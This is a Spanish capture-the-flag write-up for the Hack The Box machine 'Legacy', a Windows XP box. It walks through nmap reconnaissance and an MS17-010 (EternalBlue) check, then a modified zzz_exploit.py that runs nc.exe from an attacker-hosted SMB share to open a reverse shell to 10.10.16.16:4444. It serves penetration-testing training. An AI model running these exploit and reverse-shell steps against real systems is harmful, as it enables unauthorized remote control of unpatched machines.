Legacy

Skills

• SMB Enumeration
• Eternalblue Exploitation (MS17-010) [Triple Z Exploit]

Certificaciones

• eJPT
• OSCP

Descripción

Legacy es una máquina easy windows, ganaremos acceso como usuario Administrator explotando el MS17-010, más conocido como eternal blue

---

Reconocimiento

Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad

# ping 10.129.97.63    
PING 10.129.97.63 (10.129.97.63) 56(84) bytes of data.
64 bytes from 10.129.97.63: icmp_seq=1 ttl=127 time=60.7 ms
64 bytes from 10.129.97.63: icmp_seq=2 ttl=127 time=62.1 ms
^C
--- 10.129.97.63 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 60.688/61.378/62.068/0.690 ms

Nmap

Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap

# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.97.63 -oG openPorts 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 14:37 CEST
Initiating SYN Stealth Scan at 14:37
Scanning 10.129.97.63 [65535 ports]
Discovered open port 139/tcp on 10.129.97.63
Discovered open port 445/tcp on 10.129.97.63
Discovered open port 135/tcp on 10.129.97.63
Completed SYN Stealth Scan at 14:37, 14.53s elapsed (65535 total ports)
Nmap scan report for 10.129.97.63
Host is up (0.074s latency).
Not shown: 64202 closed tcp ports (reset), 1330 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.61 seconds
           Raw packets sent: 72026 (3.169MB) | Rcvd: 65733 (2.629MB)

Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados

# nmap -sCV -p 135,139,445 10.129.97.63 -oN services                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 14:38 CEST
Nmap scan report for 10.129.97.63
Host is up (0.11s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-07-27T17:35:57+03:00
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:4f:f8 (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.78 seconds

SMB Enumeration

Como se está usando windows xp y smb vamos a ver si es vulnerable

# nmap --script "vuln and safe" -p 445 10.129.97.63 -oN smbScan 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 01:08 CEST
Nmap scan report for 10.129.97.63
Host is up (0.065s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds     

SMB Exploitation

Como es vulnerable al Eternal blue (ms17-010) podemos ganar acceso como Administrator. Para probar si es vulnerable además del script de nmap podemos usar el checker.py de https://github.com/worawit/MS17-010. Como el script es antiguo, voy a crear un proyecto en Pycharm con Conda con la versión 2.7 de Python y voy a instalar la versión de Impacket 0.9.19 que es la que había en 2017, que a su vez, es el año en el que se creó el script. Una vez hecho esto nos clonamos el proyecto de github y accedemos a su interior, desde la consola de Pycharm ejecutamos el checker.py para saber si es vulnerable

# python2 checker.py 10.129.227.181
Target OS: Windows 5.1
The target is not patched

=== Testing named pipes ===
spoolss: Ok (32 bit)
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: Ok (32 bit)

Efectivamente, es vulnerable, para tener ejecución remota de comandos vamos a modificar el script zzz_exploit.py

def smb_pwn(conn, arch):
        #smbConn = conn.get_smbconnection()
          
        #print('creating file c:\\pwned.txt on the target')
        #tid2 = smbConn.connectTree('C$')
        #fid2 = smbConn.createFile(tid2, '/pwned.txt')
        #smbConn.closeFile(tid2, fid2)
        #smbConn.disconnectTree(tid2)
        
        #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
        service_exec(conn, r'cmd /c ping 10.10.16.16')
        # Note: there are many methods to get shell over SMB admin session
        # a simple method to get shell (but easily to be detected by AV) is
        # executing binary generated by "msfvenom -f exe-service ..."

Ahora debemos ejecutar el script

# python2 zzz_exploit.py 10.129.227.181 browser

Recibimos en nuestro equipo trazas icmp

# sudo tcpdump -i tun0 icmp
[sudo] password for justice-reaper: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
16:05:02.159309 IP 10.129.227.181 > 10.10.16.16: ICMP echo request, id 512, seq 256, length 40
16:05:02.163609 IP 10.10.16.16 > 10.129.227.181: ICMP echo reply, id 512, seq 256, length 40
16:05:03.171402 IP 10.129.227.181 > 10.10.16.16: ICMP echo request, id 512, seq 512, length 40
16:05:03.171475 IP 10.10.16.16 > 10.129.227.181: ICMP echo reply, id 512, seq 512, length 40
16:05:04.171822 IP 10.129.227.181 > 10.10.16.16: ICMP echo request, id 512, seq 768, length 40
16:05:04.171843 IP 10.10.16.16 > 10.129.227.181: ICMP echo reply, id 512, seq 768, length 40

Nos copiamos nc.exe en el directorio actual y nos montamos un servidor smb

# cp /usr/share/windows-resources/binaries/nc.exe .
# impacket-smbserver smbFolder $(pwd) -smb2support

Nos ponemos en escucha con netcat por el puerto 4444

# nc -nlvp 4444

Modificamos el scrip zzz_exploit.py

def smb_pwn(conn, arch):
	#smbConn = conn.get_smbconnection()
	
	#print('creating file c:\\pwned.txt on the target')
	#tid2 = smbConn.connectTree('C$')
	#fid2 = smbConn.createFile(tid2, '/pwned.txt')
	#smbConn.closeFile(tid2, fid2)
	#smbConn.disconnectTree(tid2)
	
	#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
	service_exec(conn, r'cmd /c \\10.10.16.16\smbFolder\nc.exe -e cmd 10.10.16.16 4444')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

Ejecutamos el exploit

# python2 zzz_exploit.py 10.129.227.181 browser

Recibimos la consola como usuario Administrator

# nc -nlvp 4444      
listening on [any] 4444 ...
connect to [10.10.16.16] from (UNKNOWN) [10.129.227.181] 1041
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>